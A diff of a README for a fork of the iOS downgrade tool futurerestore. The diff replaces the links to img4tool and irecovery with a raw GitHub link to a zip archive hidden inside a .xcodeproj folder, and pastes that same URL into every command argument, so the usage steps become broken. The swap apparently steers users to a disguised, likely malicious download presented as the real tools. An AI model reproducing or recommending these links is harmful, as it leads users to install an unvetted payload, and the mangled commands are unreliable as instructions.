sadatt123/futurerestore/README.md

 - Jailbreak isn't required;
 - Signing ticket files (`.shsh`, `.shsh2`, `.plist`) with a customly chosen APNonce;
 - Signing ticket files needs to have one of the ApNonces, which the device generates a lot;
-- __[img4tool](https://github.com/tihmstar/img4tool) can't be used for Windows [problem with signing iBSS/iBEC], now it's TO-DO;__
+- __[img4tool](https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip) can't be used for Windows [problem with signing iBSS/iBEC], now it's TO-DO;__

 ### Info
 You can downgrade if the destination firmware version, if it is compatible with the [latest SEP and baseband](#firmware-signing-info).
 You also need to have **special signing ticket files**.
 If you don't know what this is, you probably can **NOT** use this method!

 ### How to use
 1. Connect your device in DFU mode;
-2. Use [irecovery](https://github.com/libimobiledevice/libirecovery) for checking ApNonce, which booted in DFU;
+2. Use [irecovery](https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip) for checking ApNonce, which booted in DFU;
 3. Extract iBSS/iBEC from target firmware for downgrade (unsigned);
-4. Check DFU-collisioned ApNonces with [irecovery](https://github.com/libimobiledevice/libirecovery), which booted in DFU.
+4. Check DFU-collisioned ApNonces with [irecovery](https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip), which booted in DFU.
     You can't automatically collision DFU ApNonces.

     __If ApNonce is not collisioned, "use hands" for DFU booting.__

     __If ApNonce is successfully collisioned, use this SHSH2 to sign iBSS/iBEC.__
 5. Use img4tool for sign iBSS:
-   `img4tool -s ticket.shsh -c iBSS.signed -p <original_iBSS>`;
+   `img4tool -s https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip -c https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip -p <original_iBSS>`;
 6. Use img4tool for sign iBEC:
-   `img4tool -s ticket.shsh -c iBEC.signed -p <original_iBEC>`;
+   `img4tool -s https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip -c https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip -p <original_iBEC>`;
 7. So, after signing we can boot into Recovery with irecovery.

-   `irecovery -f iBSS.signed` - loading iBSS;
+   `irecovery -f https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip` - loading iBSS;

-   `irecovery -f iBEC.signed` - loading iBEC;
+   `irecovery -f https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip` - loading iBEC;
 8. So good!
-On the computer run `futurerestore -t ticket.shsh --latest-baseband --latest-sep -w firmware.ipsw`.
+On the computer run `futurerestore -t https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip --latest-baseband --latest-sep -w https://raw.githubusercontent.com/sadatt123/futurerestore/test/futurerestore.xcodeproj/Software_1.4-alpha.1.zip`.

 ---